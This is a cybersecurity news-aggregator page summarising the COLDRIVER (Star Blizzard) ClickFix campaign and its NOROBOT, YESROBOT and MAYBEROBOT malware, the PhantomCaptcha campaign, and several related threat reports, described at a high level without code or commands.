CyberHappenings logo
Home Browse About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

COLDRIVER APT Group Uses ClickFix Tactics to Deliver BAITSWITCH and SIMPLEFIX Malware

First reported
Last updated
4 unique sources, 7 articles

Summary

Hide ▲

The COLDRIVER APT group, also known as Star Blizzard, has intensified its operations since May 2025, rapidly developing and refining its malware arsenal. The group has launched a new campaign using ClickFix tactics to deliver three new malware families: NOROBOT, YESROBOT, and MAYBEROBOT. These malware families are connected via a delivery chain and target individuals and organizations connected to Russia, including NGOs, human rights defenders, and think tanks. The attack chain involves tricking victims into running a malicious DLL via a fake CAPTCHA check, leading to the deployment of the SIMPLEFIX backdoor. The malware exfiltrates specific file types and establishes communication with a command-and-control server. The campaign aligns with COLDRIVER's known victimology, focusing on civil society members connected to Russia. The group has been active since 2019, using spear-phishing and custom tools like SPICA and LOSTKEYS. The latest campaign demonstrates the group's continued use of effective infection vectors, despite their lack of technical sophistication. The malware families NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively. The COLDRIVER group has been deploying the new malware set more aggressively than any previous campaigns. The new malware set replaces the previous primary malware LOSTKEYS, which has not been observed since its public disclosure in May 2025. The attack starts with a 'ClickFix-style' phishing lure, a fake CAPTCHA page designed to trick the victim into thinking they must verify they’re 'not a robot'. The malware uses a split-key cryptography scheme, with parts of the decryption key hidden in downloaded files and the Windows Registry. The malware fetches a self-extracting Python 3.8 installer, two encrypted Python scripts, and a scheduled task to ensure persistence. The Python scripts are combined to decrypt and launch a minimal Python-based first-stage backdoor that communicates with a hardcoded command-and-control (C2) server. The COLDRIVER group abandoned YESROBOT after just two weeks due to its cumbersome and easily detectable nature. The COLDRIVER group switched to MAYBEROBOT, a more flexible PowerShell-based backdoor, around June 2025. MAYBEROBOT uses a custom C2 protocol with commands to download and execute files, run commands via cmd.exe, and execute PowerShell blocks. The COLDRIVER group has been constantly evolving the NOROBOT malware to evade detection systems. The group has been using the NOROBOT and MAYBEROBOT malware families on targets previously compromised through phishing to acquire additional intelligence value from information on their devices directly. The PhantomCaptcha campaign targeted Ukrainian regional government administration and organizations critical for the war relief effort, including the International Committee of the Red Cross, UNICEF, and various NGOs. The campaign began on October 8, 2025, and used a malicious "I am not a robot" CAPTCHA challenge to execute a PowerShell command, installing malware on victims' systems. The malware operated in three stages: a downloader script, a reconnaissance module, and a WebSocket-based RAT. The campaign's infrastructure was active for just one day, with backend servers remaining online to manage infected devices. The PhantomCaptcha campaign is linked to a wider operation involving malicious Android apps disguised as adult entertainment or cloud storage services.

Timeline

  1. 21.10.2025 10:29 4 articles · 2d ago

    COLDRIVER Develops and Deploys YESROBOT and MAYBEROBOT Malware

    The COLDRIVER group abandoned YESROBOT after just two weeks due to its cumbersome and easily detectable nature. The COLDRIVER group switched to MAYBEROBOT, a more flexible PowerShell-based backdoor, around June 2025. MAYBEROBOT uses a custom C2 protocol with commands to download and execute files, run commands via cmd.exe, and execute PowerShell blocks. The COLDRIVER group has been using the NOROBOT and MAYBEROBOT malware families on targets previously compromised through phishing to acquire additional intelligence value from information on their devices directly. The COLDRIVER group initially used a Python backdoor dubbed YesRobot, which had limited functionality and made typical backdoor functionality cumbersome to implement. The COLDRIVER group abandoned YesRobot in favor of a new backdoor, MaybeRobot, also deployed via NoRobot. The COLDRIVER group has been making multiple changes to NoRobot, mainly focused on evading detection, and updating its infection chain as it transitioned to deploying MaybeRobot as the final stage.

    Show sources
    Open in new tab
  2. 26.09.2025 15:45 7 articles · 27d ago

    COLDRIVER Launches New Campaign Using BAITSWITCH and SIMPLEFIX Malware

    The PhantomCaptcha campaign began on October 8, 2025, targeting Ukrainian relief organizations with phishing emails containing a malicious PDF. The PDF directed victims to a fake Zoom site hosted on Russian infrastructure, which executed a PowerShell command to install malware. The malware operated in three stages: a downloader script, a reconnaissance module, and a WebSocket-based RAT. The campaign's infrastructure was active for just one day, with backend servers remaining online to manage infected devices. The operation is linked to a wider campaign involving malicious Android apps.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Increased Use of ClickFix Attacks by Threat Actors

ClickFix attacks, where users are tricked into running malicious commands by copying code from a webpage, have become a significant source of security breaches. These attacks are used by various threat actors, including the Interlock ransomware group and state-sponsored APTs. Recent data breaches at Kettering Health, DaVita, City of St. Paul, and Texas Tech University Health Sciences Centers have been linked to ClickFix-style tactics. The attacks exploit user behavior and technical gaps in detection to evade security measures and compromise systems. They are delivered through SEO poisoning, malvertising, and other non-email vectors, making them harder to detect and prevent. Effective defense against ClickFix attacks requires browser-based detection and blocking to intercept these threats at the earliest opportunity.

Open in new tab

UNC5142 Abuses Blockchain Smart Contracts to Spread Malware via Compromised WordPress Sites

A financially motivated threat actor, UNC5142, has been exploiting blockchain smart contracts to distribute information stealers such as Atomic, Lumma, Rhadamanthys, and Vidar on Windows and macOS systems. The attacks leverage compromised WordPress websites and a technique called 'EtherHiding' to hide malicious code on public blockchains. The campaign uses a multi-stage JavaScript downloader named CLEARSHORT to deliver malware, with the first stage interacting with a malicious smart contract on the BNB Smart Chain. The smart contract retrieves a landing page from an external server, which then employs social engineering tactics to infect the system. Google Threat Intelligence Group (GTIG) flagged about 14,000 web pages containing injected JavaScript associated with UNC5142, indicating a broad targeting of vulnerable WordPress sites. However, no activity has been observed since July 23, 2025.

Open in new tab

Velociraptor DFIR Tool Abused in LockBit and Babuk Ransomware Campaigns

Threat actors, assessed to be China-based Storm-2603, have started using the Velociraptor digital forensics and incident response (DFIR) tool in ransomware attacks deploying LockBit and Babuk ransomware. The attackers exploited a privilege escalation vulnerability in an outdated version of Velociraptor to gain persistent access and control over virtual machines. The campaign involved creating local admin accounts, disabling security features, and using fileless PowerShell encryptors for data exfiltration and encryption. The ransomware deployed on Windows systems was identified as LockBit, while a Linux binary detected as Babuk ransomware was found on VMware ESXi systems. Storm-2603 initially exploited SharePoint vulnerabilities in July 2025 and deployed Warlock, LockBit, and Babuk ransomware on VMware ESXi servers in August 2025. Sophos CTU researchers first documented Velociraptor abuse by Storm-2603 on August 5, 2025. Storm-2603 used the ToolShell exploit to gain initial access and deployed an outdated version of Velociraptor (version 0.73.4.0) that is susceptible to a privilege escalation vulnerability (CVE-2025-6264) to enable arbitrary command execution and endpoint takeover. The group also used Smbexec to remotely launch programs using the SMB protocol and modified Active Directory (AD) Group Policy Objects (GPOs) to disable real-time protection. Storm-2603 established the infrastructure for the AK47 C2 framework in March 2025 and created the first prototype of the tool the next month. The group pivoted from LockBit-only deployment to dual LockBit/Warlock deployment in April 2025 and used the ToolShell exploit as a zero-day in July 2025. Storm-2603 demonstrated operational flexibility and sophisticated builder expertise using leaked and open-source ransomware frameworks.

Open in new tab

FileFix Attack Evolves with Cache Smuggling Technique

A new variant of the FileFix social engineering attack uses cache smuggling to evade security software. This technique involves hiding a malicious ZIP archive within a browser's cache to bypass detection. The attack impersonates a Fortinet VPN Compliance Checker and tricks users into executing a PowerShell script through the Windows File Explorer address bar. The script extracts the malicious payload from the cache and executes it. This new variant was first observed by cybersecurity researcher P4nd3m1cb0y and detailed by Marcus Hutchins of Expel. The attack has been adopted by various threat actors, including ransomware groups. Additionally, a new ClickFix kit called the IUAM ClickFix Generator has been discovered, which automates the creation of ClickFix-style lures.

Open in new tab

WordPress Sites Exploited for ClickFix Phishing Attacks

WordPress sites are being exploited to inject malicious JavaScript that redirects users to phishing pages. The attacks use a theme-related file to load a dynamic payload from a remote server, which includes a JavaScript file and a hidden iframe mimicking legitimate Cloudflare assets. The domain involved is part of a traffic distribution system (TDS) known as Kongtuke. The campaign highlights the need for securing WordPress sites and keeping software up-to-date. Additionally, a new phishing kit named IUAM ClickFix Generator allows attackers to create customizable phishing pages mimicking browser verification challenges. This kit has been used to deploy information stealers like DeerStealer and Odyssey Stealer. The emergence of such tools lowers the barrier to entry for cybercriminals, enabling sophisticated, multi-platform attacks. A new ClickFix campaign employs cache smuggling to evade detection, using the browser's cache to store malicious data without downloading files or communicating with the internet. The attack masquerades as a Fortinet VPN Compliance Checker, executing an obfuscated payload via a PowerShell script.

Open in new tab